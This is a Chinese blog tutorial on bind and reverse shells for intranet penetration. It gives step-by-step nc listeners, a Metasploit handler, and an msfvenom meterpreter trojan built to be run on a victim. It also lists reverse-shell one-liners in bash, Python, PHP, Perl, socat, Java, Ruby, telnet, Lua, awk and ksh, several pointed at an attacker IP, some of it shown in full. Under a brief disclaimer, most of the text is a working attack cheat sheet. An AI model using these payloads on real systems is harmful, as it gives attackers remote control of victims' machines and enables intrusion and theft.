当前位置:   article > 正文

内网渗透---反弹shell详解(内有各种姿势的详细过程)_内网shell

内网shell

声明:文章技术仅供网络安全技术人员及白帽子使用,任何个人或组织不可用于
违法犯罪,一经发现直接上报国家安全机关处理.

反弹shell

反弹shell:
在攻击者机器获得受害者机器的命令行。

背景:

对内网有更深入的理解,了解内网的组织结构,为了更好的进行内网渗透。

正向反弹shell:

目的:

利用nc正向连接目标服务器的shell,获得目标服务器的控制权限(dmz大型靶场)

前提:

攻击者可以访问(连接)web服务器的目标(开放)端口,web服务器防火墙未拦截攻击者的入站流量。适用于,能够访问到被控机器的开放端口。

实验环境:

物理机(攻击机):
目标服务器(公网windows): ***.***.88.201:6666

网络拓扑:

实验步骤:

步骤一:
主动连接被控主机shell,在被控主机上使用nc监听6666端口,成功反弹shell后就控制目标服务器的cmd.exe程序(只要连接到目标服务器的6666端口,就会执行cmd.exe),结果如下图所示:
命令:

#被控主机为Windows,使用以下命令:
nc.exe -lvp 4444 -e cdm.exe
#被控主机为linux,使用以下命令:
nc -lvp 4444 -e /bin/bash
  • 1
  • 2
  • 3
  • 4

下图为被控主机:

步骤二:
攻击机连接目标服务器的6666端口,结果如下图所示:
命令:

#攻击者:
#nc -vv 被控服务器ip 4444
nc -vv ***.***.88.201 6666
  • 1
  • 2
  • 3

下图是攻击者主机:

反向反弹shell:

目的:

利用nc反向反弹shell到攻击者本地,获得目标服务器的控制权限(dmz大型靶场)

前提:

1、防火墙对web服务器(被控主机)出站流量放行。
2、攻击者必须有一个公网ip。

实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控机器(公网windows):

网络拓扑:

实验步骤:

步骤一:
攻击者外网vps监听9999端口:
攻击者kali(公网ip)进行监听本地9999端口,被控主机反弹shellkali(公网ip)9999端口,结果如下图所示:
命令:

#攻击机器(公网kali):***.***.23.106:9999
nc -lvvp 9999
  • 1
  • 2

下图为公网kali:

步骤二:
把被控主机的shell反弹到攻击者kali9999端口,如下图所示:
命令:

#nc -e /bin/bash 攻击者公网ip 9999 (反弹linux shell) 
#nc -e cmd.exe 攻击者公网ip 9999(反弹windows shell)
  • 1
  • 2

下图为被控主机:

步骤二:
查看kali,显示成功反弹目标服务器的shell,如下图所示:

分析:
能够反弹成功,需要攻击者开启公网kali的监听端口,并让防火墙对经过9999端口的流量进行放行;
被攻击者需要有攻击者的公网ip,并且被攻击者的流量能够出来。

其他方式反弹shell:

msf反弹:
实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控主机(虚拟机win8):

实验步骤:

步骤一:
攻击者公网vps监听9999端口:
攻击者在公网kali(公网ip)使用msf的 msfconsole进行监听9999端口的木马反弹,结果如下图所示:
命令:

#攻击机器(公网kali):***.***.23.106:9999
msfconsole 
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost ***.***.23.106:9999
set lport 9999
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6



在这里插入图片描述
步骤三:
生成一个反弹木马,并将生成的木马上传到被控主机(虚拟机win8)上,并进行点击运行,使被控主机反弹shellkali(公网ip)9999端口,如下图所示:

命令:

#使用msfvenom生成反弹木马:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=***.***.23.106:9999lport=9999 -f exe -o test.exe
#这里是使用finalshell远程连接公网kali的,所以使用sz命令下载刚才生成的木马到物理机:
sz test.exe
#下面就是把下载下来的木马文件放到被控主机(虚拟机win8)。
  • 1
  • 2
  • 3
  • 4
  • 5


步骤三:
被控主机(虚拟机win8)上,点击运行test.exe(这个木马文件),并进行查看公网kali反弹情况,如下图所示:
![](https://img-blog.csdnimg.cn/img_convert/8de3160d43858ec7edbe0cb324322183.png

bash反弹:
实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控机器(虚拟机centos6.5):

实验步骤:
接收端(攻击者ip,公网): nc -lvvp 端口
发送端(被控主机):bash -i >& /dev/tcp/攻击者ip(公网)/攻击者端口 0>&1
发送端(被控主机):0<&31-;exec 31<>/dev/tcp/攻击者ip(公网)/攻击者端口; sh <&31 >&31 2>&31
  • 1
  • 2
  • 3

步骤一:
为了保证环境的贴近实战,保持防火墙开启状态。(反弹shell有正向和反向的,我们90%都是反向反弹的shell。
正常情况下,攻击者是无法正向连接目标服务器的;除了开启22端口,通过ssh可以连接进来的,但是ssh我们不知道帐号密码;我们最主要的目的是获取目标主机的反向shell,所以防火墙可以不用关闭)。只关闭setenforce(setlinux),并查看防火墙状态,如下图所示:
命令:

#关闭setlinux
setenforce 0
#查看防火墙状态:
service iptables status
  • 1
  • 2
  • 3
  • 4

步骤二:
攻击者外网vps监听9999端口:
攻击者kali(公网ip)进行监听本地9999端口,被控主机反弹shellkali(公网ip)9999端口,结果如下图所示:
命令:

#攻击机器(公网kali):***.***.23.106:9999
nc -lvvp 9999
  • 1
  • 2


命令:

bash -i >& /dev/tcp/***.***.23.106/9999 0>&1
  • 1

步骤三:
被控机器(虚拟机centos6.5)上,使用bashshell反弹到攻击者公网kali上,并进行查看公网kali反弹情况,如下图所示:

python反弹:
实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控机器(虚拟机centos6.5):

实验步骤:
接收端(攻击者ip,公网): nc -lvvp 端口
发送端(被控主机):python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击者公网ip",攻击者公网监听端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • 1
  • 2

步骤一:
攻击者公网vps监听9999端口:
攻击者kali(公网ip)进行监听本地9999端口,被控主机反弹shellkali(公网ip)9999端口,结果如下图所示:
命令:

#攻击机器(公网kali):***.***.23.106:9999
nc -lvvp 9999
  • 1
  • 2

步骤二:
被控机器(虚拟机centos6.5)上,使用pythonshell反弹到攻击者公网kali上,并进行查看公网kali反弹情况,如下图所示:
命令:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("***.***.23.106",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  • 1


php反弹:
实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控机器(虚拟机centos6.5):

实验步骤:
接收端(攻击者ip,公网): nc -lvvp端口
发送端(被控主机):bash -i >& /dev/tcp/攻击者ip(公网)/攻击者端口 0>&1
发送端(被控主机):php -r '$sock=fsockopen("攻击者ip",端口);exec("/bin/sh -i <&3 >&3 2>&3");'
  • 1
  • 2
  • 3

步骤一:
攻击者公网vps监听9999端口:
攻击者kali(公网ip)进行监听本地9999端口,被控主机反弹shellkali(公网ip)的9999端口:
命令:

#攻击机器(公网kali):***.***.23.106:9999
nc -lvvp 9999
  • 1
  • 2

步骤二:
被控机器(虚拟机centos6.5)上,使用phpshell反弹到攻击者公网kali上,并进行查看公网kali反弹情况:
命令:

php -r '$sock=fsockopen("***.***.23.106",9999);exec("/bin/bash -i <&3 >&3 2>&3");'
  • 1
perl反弹:
实验环境:

攻击机器(公网kali):***.***.23.106:9999
被控机器(虚拟机centos6.5):

实验步骤:
接收端(攻击者ip,公网): nc -lvvp端口
发送端:perl -e 'use Socket;$i="攻击者ip";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
  • 1
  • 2

步骤一:
攻击者公网vps监听9999端口:
攻击者kali(公网ip)进行监听本地9999端口,被控主机反弹shellkali(公网ip)9999端口,结果如下图所示:
命令:

#攻击机器(公网kali):***.***.23.106:9999
nc -lvvp 9999
  • 1
  • 2


步骤三:
被控机器(虚拟机centos6.5)上,使用bashshell反弹到攻击者公网kali上,并进行查看公网kali反弹情况,如下图所示:
命令:

perl -e 'use Socket;$i="***.***.23.106";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
  • 1

在这里插入图片描述

linux反弹shell姿势合集:

在目标服务器(linux)上面进行反弹shell时,可以通过以下命令,查看目标服务器上面有没有安装对应的程序:
命令:

#比如查看目标服务器上面有没有安装php服务:
rpm -q php
  • 1
  • 2

出现服务程序的版本号说明已经安装,如下图所示:

linux反弹shell总结

1.1发送文件(公网发内网)
文件发送端:nc -lp 6666 < 文件
文件接收端:nc 发送端ip 发送端端口 > 新文件

1.2发送文件(内网发公网)
文件发送端:nc -lp 6666 > 文件
文件接收端:nc 发送端ip 发送端端口 < 新文件

2.聊天
发送端:nc -lp 6666
接收端:nc 发送端ip 发送端端口

3.1发送shell
发送端(公网服务器):nc -lvvp 6666 -e /bin/bash
接收端:nc 发送端ip 发送端攻击者ip

3.2反弹shell
接收端:nc -lvvp 6666
发送端(内网网服务器):nc 接收端ip 接收端端口 -e /bin/bash

4.bash反弹
接收端(hackip,公网):nc -lvvp 端口
发送端(受害者):bash -i >& /dev/tcp/111.230.170.95/9985 0>&1
发送端(受害者):0<&31-;exec 31<>/dev/tcp/111.230.170.95/9985;sh <&31 >&31 2>&31


5.1socat反弹(tcp)
接收端(攻击机):./socat TCP-LISTEN:端口 -
发送端(靶机):./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:攻击机ip:攻击机端口

5.2socat反弹(udp)
接收端:nc -lvvp 8080
发送端:socat udp-connect:攻击者ip:端口 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &

6.python反弹
接收端(攻击机,外网):nc -lvvp 端口
发送端(靶机):python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("接收端ip",接收端端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

7.PHP反弹
接收端:nc -lvvp 端口
发送端:php -r '$sock=fsockopen("攻击者ip",端口);exec("/bin/sh -i <&3 >&3 2>&3");'

8.JAVA反弹
接收端:nc -lvvp 端口
发送端:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/攻击者ip/端口;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

9.perl反弹
接收端:nc -lvvp 端口
发送端:
perl -e 'use Socket;$i="攻击者ip";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

10.ruby反弹
接收端:nc -lvvp 端口
发送端:
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("攻击者ip","端口");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

11.telnet反弹
接收端:nc -lvvp 端口
发送端:
mknod backpipe p && telnet 攻击者ip 端口 0<backpipe | /bin/bash 1>backpipe

12.lua反弹(安装lua环境:apt-get install lua*)
接收端:nc -lvvp 端口
发送端:lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('攻击者ip',端口);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"

13.awk反弹
接收端:nc -lvvp 端口
发送端:awk 'BEGIN{s="/inet/tcp/0/攻击者ip/端口";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'

14.ksh反弹
接收端:nc -lvvp 端口
发送端:ksh -c 'ksh >/dev/tcp/攻击者ip/端口 2>&1 <&1'

15.msfvenom生成各种payload
接收端:nc -lvvp 端口
查找payload:msfvenom -l payload |grep 'cmd/unix/reverse'
生成payload:msfvenom -p cmd/unix/reverse_模块 lhost=接收端ip lport=接收端端口 R
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17
  • 18
  • 19
  • 20
  • 21
  • 22
  • 23
  • 24
  • 25
  • 26
  • 27
  • 28
  • 29
  • 30
  • 31
  • 32
  • 33
  • 34
  • 35
  • 36
  • 37
  • 38
  • 39
  • 40
  • 41
  • 42
  • 43
  • 44
  • 45
  • 46
  • 47
  • 48
  • 49
  • 50
  • 51
  • 52
  • 53
  • 54
  • 55
  • 56
  • 57
  • 58
  • 59
  • 60
  • 61
  • 62
  • 63
  • 64
  • 65
  • 66
  • 67
  • 68
  • 69
  • 70
  • 71
  • 72
  • 73
  • 74
  • 75
  • 76
  • 77
  • 78
  • 79
  • 80
  • 81
  • 82

原创不易,转载请注明来源!

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/你好赵伟/article/detail/485825
推荐阅读
相关标签
  

闽ICP备14008679号